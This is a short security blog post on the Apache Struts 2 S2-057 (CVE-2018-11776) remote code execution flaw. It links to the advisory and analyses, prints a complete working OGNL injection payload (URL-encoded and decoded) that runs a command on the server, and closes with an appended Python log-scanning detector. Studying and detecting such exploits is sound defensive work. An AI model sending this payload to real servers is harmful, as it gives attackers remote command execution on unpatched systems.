Neurohazard

Apache Struts 2 RCE S2-057 (CVE-2018-11776)

wpadmin, August 23, 2018, InfoSec


Brief description

Remote code execution
Apache Struts 2 RCE S2-057 (CVE-2018-11776)
https://cwiki.apache.org/confluence/display/WW/S2-057

Vulnerability details
https://lgtm.com/blog/apache_struts_CVE-2018-11776

Test environment
https://github.com/jas502n/St2-057

S2-057 principle analysis and reproduction process (POC), original by gyyyy, 猎户攻防实验室 (Orion Offense and Defense Lab), 2018-08-23 (link)

Other supplements (reposted)

Supplement 1

About CVE-2018-11776/S2-057

In the Struts 2 source code, the wildcard attribute configuration defaults to false.

<constant name="struts.mapper.alwaysSelectFullNamespace" value="false" />

So S2-057 attacks still have certain limitations.

(All the platforms and WeChat public accounts said it was urgent; it nearly scared me into going back to do emergency response.)

Supplement 2

@阿烨

http://192.168.44.1:8080/struts2-showcase/%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d/actionChain1.action

Key payload

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}
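The request above places the OGNL expression in a namespace segment of the URL path, before the action name. As an added example (not from the original post or any of the reposted sources), the following Python check percent-decodes the request path of each access-log line, including double-encoded paths, and flags OGNL expression markers (`${` or `%{`) so such requests can be surfaced in detection tooling; the log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined-style); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Aug/2018:10:01:02 +0000] "GET /struts2-showcase/actionChain1.action HTTP/1.1" 200 512
10.0.0.7 - - [23/Aug/2018:10:01:09 +0000] "GET /struts2-showcase/%24%7b(%23x%3d1)%7d/actionChain1.action HTTP/1.1" 302 0
10.0.0.9 - - [23/Aug/2018:10:02:15 +0000] "GET /struts2-showcase/%2524%257b(1)%257d/index.action HTTP/1.1" 200 88
10.0.0.3 - - [23/Aug/2018:10:03:00 +0000] "POST /struts2-showcase/login.action HTTP/1.1" 200 1024
"""

# Extracts the method and request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markers of an OGNL expression as Struts would evaluate it in a namespace.
OGNL_MARKER_RE = re.compile(r'[$%]\{')


def decode_fully(s, max_rounds=3):
    """Percent-decode repeatedly so double- or triple-encoded paths are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def path_of(target):
    """Return the path component only; the query string is not where S2-057 injects."""
    return target.split('?', 1)[0]


def suspicious_requests(log_text):
    """Return (line number, client IP, decoded path) for requests whose path
    contains an OGNL expression marker in a segment before the action name."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = decode_fully(path_of(m.group('target')))
        if OGNL_MARKER_RE.search(path):
            hits.append((lineno, line.split()[0], path))
    return hits


if __name__ == '__main__':
    for lineno, ip, path in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: {ip} requested {path}")
```

A production version would also apply this check to proxy logs in front of Struts, since a WAF or reverse proxy may see the request before the application decodes it.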
